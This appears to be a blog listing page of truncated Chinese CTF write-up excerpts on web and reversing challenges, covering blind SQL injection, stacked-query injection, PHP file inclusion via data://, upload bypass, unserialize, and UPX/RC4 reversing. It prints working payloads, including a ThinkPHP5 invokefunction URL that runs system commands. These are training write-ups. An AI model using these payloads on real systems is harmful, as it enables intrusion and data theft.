NewStar blindsql1 web
NewStar blindsql1 web wp参考官解:blindsql1 | WriteUp - NewStar CTF 2024 发现单引号闭合 输入空格,=,union,/发现都被过滤了 是个布尔盲注,多试几个,然后可以写sql看看 1Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('a'))# 然后写脚本,这里我参考官解,然后解释一下几个易错点 char = f’(ord(mid({tables},{i},1)))这里这块table不能直接放进去 也就是说 1char =...
NewStar RE WP
NewStar RE WPUPX本文wp参考官解UPX | WriteUp - NewStar CTF 2024,为了加深自己理解 64位,upx脱壳 主函数 关注到data,看看data是啥 交叉引用: 得到data 回到主函数看看key是什么 RC4算法: init_sbox(初始化s盒) 方法一RC4是一种流加密算法,本质是异或,因此可以a ^ b = c,c ^ b = a,将密文作为输入输入进去,就可以得到原来的flag 跑脚本,按着逻辑写就行 注意这里有一个细节,这里的数都是无符号数,也就是说data = [-60, 96, -81, -71, -29, -1, 46, -101, -11, 16, 86,81, 110, -18, 95, 125, 125, 110, 43, -100, 117, -75]都是无符号数,要给他转化,unsigned char 的范围是 0 到...
NewStar 这“照片”是你吗 web
NewStar 这“照片”是你吗 web源码提示: 为什么没有Nginx或Apache就能说明服务器脚本能够处理静态文件? 在一般的 Web 服务器部署中,静态资源(如图片、CSS 文件)通常由 Nginx 或 Apache 这样的服务器专门处理,因为它们效率更高,如果页面上的图标或图片等静态资源能正常显示,说明服务器脚本(如 Flask、Django 等)自己在处理这些文件请求,可以推测应用服务器(如 Flask...
逆向攻防世界CTF系列1-Hello,CTF
逆向CTF系列1-Hello,CTF下载文件首先查壳 是32位的。 上面的图看到了没有。说明这个软件是没有加壳的。是用Microsoft Visual C++ 6.0软件编写的。如果查到了是aspack的。那就说明是加了aspack的壳。您可以用专门脱aspack脱壳机来脱壳。很多高手都是用OllyDBG V1.10 手工来脱壳的。 可以先运行一下源程序,输入123,发现输出wrong 可能是要我们输出success才行。在ida中再看看,果断F5。 1234567891011121314151617181920212223242526272829303132333435363738int __cdecl main(int argc, const char **argv, const char **envp) { int i; // ebx char v4; // al int result; // eax int v6; // [esp+0h] [ebp-70h] int v7; // [esp+0h] [ebp-70h] char...
攻防世界18-Web_php_include-Web
攻防世界18-Web_php_include-CTFWeb进阶看名字可能是文件包含的题 文件包含知识点:文件包含 - Hello CTF (hello-ctf.com)和文件包含漏洞全面详解-CSDN博客 123456789<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?> 解法1:小试牛刀: 代码审计一下发现,php://会被删除掉,看一下能不能用其他的伪协议 data://text/plain,...
攻防世界17-php_rce-Web
攻防世界17-php_rce-CTFWeb进阶 这题没什么头绪,还以为是个广告,提到了ThinkPHPV5,和phprce,可以去查一下 找到了一些帖子,看一下 解法1:发现了这么一个用法: /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 可以替换一些指令,ls查看没看到一些有用的信息,我用find指令去看看find / -type f -name ‘flag‘ /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -type f -name...
攻防世界19-upload1-Web
攻防世界19-upload1-CTFWeb进阶跟上传有关,随便上传一个文件,提示上传图片 发现有disabled 解法1:删掉试试,发现可以上传了。 试试上传这个 被执行了 可以修改命令 找到了 解法2:可以试试一句话木马
攻防世界20-warmup-Web
攻防世界20-warmup-CTFWeb看源码,提示source.php 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return...
攻防世界21-Web_php_unserialize-Web
攻防世界21-Web_php_unserialize-CTFWeb跟反序列化有关 123456789101112131415161718192021222324252627<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php ...
攻防世界22-supersqli-Web
攻防世界22-supersqli-CTFWebsql注入,提交1,查询得到信息,看看是否存在注入点 1 union select 1 发现return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject); 存在过滤,这题有多种方法,涨知识 11';show databases; # 11';use supersqli;show tables;# 10';use supersqli;show columns from `1919810931114514`# 字符串为表名操作时要加反引号。 解法1:在MySQL中,handler也可以执行查询 可以查一下handler的使用方法: 10';handler `1919810931114514` open;handler `1919810931114514` read...